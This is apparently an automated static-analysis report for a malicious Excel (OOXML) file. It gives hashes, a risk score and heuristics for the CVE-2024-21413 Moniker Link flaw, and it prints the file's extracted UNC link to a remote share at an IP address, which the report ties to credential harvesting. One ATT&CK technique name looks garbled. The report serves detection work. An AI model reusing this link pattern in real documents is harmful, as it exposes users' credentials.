Malicious Office (OOXML) / .XLSX — malware analysis report

Static analysis result for SHA-256 d3bdac1a4d756ab5…

MALICIOUS

Office (OOXML) / .XLSX

5.7 KB Created: 2023-10-04 20:11:27 UTC Authoring application: Microsoft Excel 12.0000 First seen: 2023-10-13
MD5: ad318b5cf3252af10346f0a0b0390d8a SHA-1: 1c9c0ac64966d360ce37ab8e0ed0597fc8cfd534 SHA-256: d3bdac1a4d756ab5efb9022451d86ff588c9b1e20208d129e126280d42484a34
68 Risk Score

Malware Insights

MITRE ATT&CK
T1200 Hardware Add-Middlewares T1059 Command and Scripting Interpreter

The critical heuristic firing for CVE-2024-21413 indicates the file attempts to leverage a moniker link vulnerability. The presence of a UNC path in the document body strongly suggests an attempt to redirect the user to a remote network share, likely for further exploitation or credential harvesting. No scripts were extracted, and the document body content is minimal, but the vulnerability and UNC path are sufficient indicators.

Heuristics 2

  • CVE-2024-21413 — Moniker Link UNC path in OOXML critical CVE likely CVE_2024_21413
    Relationship target decodes to a file:///\\...! Moniker Link shape associated with CVE-2024-21413.
  • External hyperlinks (1) low OOXML_EXTERNAL_HYPERLINKS
    Document contains 1 external hyperlink — clickable URLs are stored as external relationships. First target: file:///\\167.235.149.241\share\[Workbookname.xlsx]SheetName'!$B$2:$C$62,2,FALSE)

Open this report in the interactive analyzer, or submit your own file for analysis.